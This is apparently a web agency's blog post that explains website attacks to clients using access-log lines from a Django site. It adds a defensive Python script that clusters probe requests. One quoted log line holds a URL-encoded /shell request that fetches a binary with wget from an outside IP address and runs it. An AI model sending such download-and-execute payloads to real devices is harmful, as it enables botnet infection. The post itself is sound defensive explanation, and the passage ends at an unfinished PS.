Cybersecurity: Bringing It Home To You
We all take care to protect our homes. Where I live we make sure we lock the front door when we are not at home. And before we go to bed.
The same goes for the online world, in general. The difference is that while the measures protecting our home are physical and visible, the measures we take against online security breaches are mostly invisible to the homeowner. They are hidden behind tech stuff.
So the object of this article is to bring online security home to you.
Let's take a look at the right-hand part of the header image. It shows a list of the "agents" that have tried to access the website of one of our clients. As you can see, I have hidden any identifying information. Also note that I am not saying "people": we don't know whether the access attempts come from people.
The first line is this:
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
Let's break it down:
Let's look at point 2 first: the requested path, /wp-login.php. That is the entrance to the content management system of a WordPress website, and requesting it would only be legitimate for the content manager of said WordPress website. But -- of course -- our client's website is built in Django, not WordPress. So what's up?
Point 1 then: the address the request came from. Let's figure out where the sending agent is located.
But before we go ahead, just a word about "location". If you wanted to know my location, as in where I am sitting (at my home in Amsterdam, writing this article), you wouldn't be able to tell from my internet address. Instead, what you would find is the physical address of the data centre that collects all internet traffic from a certain internet provider and sends it on its merry way. In my case, that is a data centre located near Schiphol International Airport when I am on one of my two internet providers. On the other, it is the northern city of Groningen.
Having said all that, let's go look.
There are a number of ways to find out something about location, but I tend to use a command line tool called "whois". It tends to show a little more detail than similar online tools.
I have hidden a number of details that I didn't think relevant. One is the name of the person listed. I looked him up; he is on LinkedIn. Seems like a nice guy. From Georgia (the one in Europe). The other detail I hid is the telecom provider, a company from the UK. I looked them up as well. In a little industrial estate somewhere between Birmingham and Nottingham. Looks like a smallish company; bet they were glad to land the project. Don't know what they are still doing in Russia though.
Point is, we have an address. Again, this is not the address of our "agent" but the address of the data centre that handles the traffic for the internet address of our agent. Seeing that greater Moscow is about half the size of the Netherlands, our agent could be somewhere within that area. That's not very precise.
Nevertheless, what is "some agent in the greater Moscow area" doing accessing the website of our client? And trying to access it as if it were a WordPress site, and as its content manager? Up to no good, no doubt. Our agent is trying our front door.
In fact, that morning, from 7:30 to 9:00 AM, no fewer than 8 agents were trying our front door, some more than once. Let's look:
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
165.232.102.155 - - [14/Sep/2024:07:29:06 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
54.36.177.206 - - [14/Sep/2024:07:41:15 +0000] "GET / HTTP/1.1" 301 162 "https://****************/wp-login.php" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
57.129.23.166 - - [14/Sep/2024:07:49:15 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
57.129.23.166 - - [14/Sep/2024:07:49:15 +0000] "POST / HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.255.160.234 - - [14/Sep/2024:08:12:39 +0000] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 146 "-" "Hello"
103.74.116.72 - - [14/Sep/2024:08:26:59 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
194.233.79.143 - - [14/Sep/2024:08:34:36 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
124.220.11.157 - - [14/Sep/2024:08:52:30 +0000] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F45.95.147.201%2Fbins%2Farm7%3B%20chmod%20777%20arm7%3B%20.%2Farm7%20jaws%3B HTTP/1.1\x5Cr\x5CnUser-Agent: Mozila/5.0\x5Cr\x5CnHost: 127.0.0.1:80\x5Cr\x5CnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\x5Cr\x5CnConnection: keep-alive\x5Cr\x5Cn\x5Cr\x5Cn\x11" 400 150 "-" "-"
57.129.23.166 - - [14/Sep/2024:08:53:03 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
57.129.23.166 - - [14/Sep/2024:08:53:03 +0000] "POST / HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
We see that some of these attempts to access our client's website look quite similar. They hit the exact same target, wp-login.php, and they carry the exact same browser signature (the user-agent string at the end of each line).
158.255.80.210 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
165.232.102.155 - - [14/Sep/2024:07:29:06 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
54.36.177.206 - - [14/Sep/2024:07:41:15 +0000] "GET / HTTP/1.1" 301 162 "https://****************/wp-login.php" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
103.74.116.72 - - [14/Sep/2024:08:26:59 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
But they do not originate from the same geographical area by any means:
Hmm. Our "agent" is attacking from multiple locations. How? Well, maybe through some combination of infected PCs and servers set up specifically for this task. What this means for us right now is that apparently we are not talking about someone sitting in some room randomly entering URLs in their browser. Rather, it is a coordinated and systematic attack, most likely automated.
But maybe "how" is less important for us right now. What is important is that our client's little website, getting maybe 10 legitimate views a day, is being attacked big time by agents all over the world. Eight in an hour and a half is more than a hundred attacks a day. That is a lot. And not only because it is a threat. We literally need to run bigger servers because the attacks outnumber the legitimate views ten to one.
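As an added example (not code from the original article), here is a small Python script that does the grouping and counting described above over log lines in this combined format: it flags requests for paths a Django site never serves, clusters them by target and user-agent string, and extrapolates the observed burst to a daily rate. The sample lines are constructed in the same format, using documentation IP ranges rather than the real sources.

```python
import re
from collections import defaultdict
from datetime import datetime
# Combined log format, as written by Apache/nginx for the lines quoted in the article.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# Paths a Django site never serves: a request for one is a probe, not a visitor.
PROBE_PATHS = ("/wp-login.php", "/.env", "/shell", "/cgi-bin/")
# Constructed sample in the same format (documentation IP ranges, not real sources).
SAMPLE_LOG = """\
192.0.2.10 - - [14/Sep/2024:07:27:10 +0000] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
192.0.2.11 - - [14/Sep/2024:07:29:06 +0000] "GET /wp-login.php HTTP/1.1" 404 118 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.51.100.5 - - [14/Sep/2024:07:41:15 +0000] "GET / HTTP/1.1" 301 162 "https://example.org/wp-login.php" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.51.100.7 - - [14/Sep/2024:07:49:15 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
203.0.113.9 - - [14/Sep/2024:08:12:39 +0000] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 146 "-" "Hello"
203.0.113.20 - - [14/Sep/2024:08:30:00 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0"
198.51.100.7 - - [14/Sep/2024:08:57:10 +0000] "GET /.env HTTP/1.1" 404 181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
"""

def parse_line(line):
    # One combined-format line -> dict of fields, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = (rec["req"].split(" ") + ["-"])[1]   # "GET /path HTTP/1.1"
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec
def probe_target(rec):
    # The path being probed, or None for ordinary traffic.
    path = rec["path"].split("?", 1)[0]    # drop any query string
    if path.startswith(PROBE_PATHS):
        return path
    if "/wp-login.php" in rec["ref"]:      # "GET /" carrying a WordPress referer
        return "/wp-login.php"
    return None

def probe_report(log_text):
    # Group probes by (target, user agent) -> set of source IPs; also hits and hits/day.
    clusters, times = defaultdict(set), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        target = probe_target(rec) if rec else None
        if target:
            clusters[(target, rec["ua"])].add(rec["ip"])
            times.append(rec["time"])
    span_h = (max(times) - min(times)).total_seconds() / 3600 if times else 0
    per_day = len(times) * 24 / span_h if span_h else float(len(times))
    return dict(clusters), len(times), round(per_day)
```

Run probe_report over a real access log (one line per request) instead of SAMPLE_LOG to see which probe signatures recur; a cluster with many source addresses behind one identical user-agent string is the fingerprint of the automated scanning discussed above.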
Luckily the web framework we use is Django, which is inherently a lot safer than many others. And many of our clients realise how important it is to maintain a tight ship when it comes to security, so they are more than willing to invest in measures that enhance security.
But for some clients, especially the smaller ones, the importance of security is less clear. They would rather have us work on features that bring immediate returns.
Sadly, the simple truth is that it is not only big companies that are attacked every single day, but everyone. You and I. The little websites of our clients.
Where I live any number of people pass by my front door. I am so glad it is securely locked.
PS: I mentioned 8 agents trying to compromise our website. Here is an explanation of the requests I have not touched upon: